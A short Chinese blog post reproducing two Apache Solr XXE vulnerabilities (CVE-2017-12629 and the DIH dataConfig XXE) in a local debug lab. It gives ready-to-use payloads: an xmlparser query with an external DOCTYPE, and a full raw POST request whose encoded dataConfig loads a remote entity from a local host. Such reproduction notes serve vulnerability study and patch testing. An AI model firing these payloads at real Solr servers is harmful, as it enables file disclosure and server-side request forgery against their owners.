内容简介:进入IDEA中配置只复现两个XXE漏洞
进入 lucene-solr\solr\bin
文件夹中,运行 solr start -p 8988 -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8988"
IDEA中配置 -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8988
漏洞复现
只复现两个XXE漏洞
CVE-2017-12629
solr create -c test # 创建核心test
payload:
http://localhost:8988/solr/test/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
Solr DIH dataConfig参数XXE漏洞
solr create -c test # 创建核心test payload请求: POST /solr/test/dataimport?_=1551604400819&indent=on&wt=json HTTP/1.1 Host: 127.0.0.1:8988 Pragma: no-cache Origin: http://127.0.0.1:8988 Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: application/json, text/plain, */* Cache-Control: no-cache Referer: http://127.0.0.1:8988/solr/ Connection: close Content-Length: 269 command=full-import&verbose=false&clean=true&commit=true&optimize=false&core=test&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2F127.0.0.1:8082%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 漏洞分析:OpenSSH用户枚举漏洞(CVE-2018-15473)分析
- 【漏洞分析】CouchDB漏洞(CVE–2017–12635, CVE–2017–12636)分析
- 【漏洞分析】lighttpd域处理拒绝服务漏洞环境从复现到分析
- 漏洞分析:对CVE-2018-8587(Microsoft Outlook)漏洞的深入分析
- 路由器漏洞挖掘之 DIR-815 栈溢出漏洞分析
- Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Chinese Authoritarianism in the Information Age
Routledge / 2018-2-13 / GBP 115.00
This book examines information and public opinion control by the authoritarian state in response to popular access to information and upgraded political communication channels among the citizens in co......一起来看看 《Chinese Authoritarianism in the Information Age》 这本书的介绍吧!
RGB转16进制工具
RGB HEX 互转工具
在线进制转换器
各进制数互转换器